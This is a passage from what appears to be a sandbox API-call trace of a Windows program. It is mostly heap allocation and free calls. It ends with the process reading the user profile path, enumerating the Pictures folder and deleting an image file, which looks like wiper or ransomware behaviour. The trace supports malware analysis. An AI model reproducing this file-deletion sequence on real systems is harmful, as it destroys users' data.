lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0256.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0256.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0256.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0256.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0256.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0256.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0256.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.206] CloseHandle (hObject=0x1f8) returned 1 [0256.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0256.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0256.209] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0256.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0256.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0256.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0256.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0256.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0256.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0256.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.211] CloseHandle (hObject=0x2cc) returned 1 [0256.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0256.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0256.213] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0256.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0256.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0256.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0256.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0256.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0256.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.219] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0256.219] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0256.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0256.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.220] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0256.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0256.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x74) returned 0x24f5278 [0256.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/krvo L5sveZ W.png", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\krvo L5sveZ W.png", lpFilePart=0x8bedfc*="krvo L5sveZ W.png") returned 0x39 [0256.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0256.221] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\krvo L5sveZ W.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\krvo l5svez w.png")) returned 0x20 [0256.221] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\krvo L5sveZ W.png", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4476fe0, ftCreationTime.dwHighDateTime=0x1d4d126, ftLastAccessTime.dwLowDateTime=0xfda7ffb0, ftLastAccessTime.dwHighDateTime=0x1d4c996, ftLastWriteTime.dwLowDateTime=0xfda7ffb0, ftLastWriteTime.dwHighDateTime=0x1d4c996, nFileSizeHigh=0x0, nFileSizeLow=0x94b9, dwReserved0=0x1644, dwReserved1=0x4, cFileName="krvo L5sveZ W.png", cAlternateFileName="KRVOL5~1.PNG")) returned 0xaa5820 [0256.222] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\krvo L5sveZ W.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\krvo l5svez w.png")) returned 1 [0256.224] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4476fe0, ftCreationTime.dwHighDateTime=0x1d4d126, 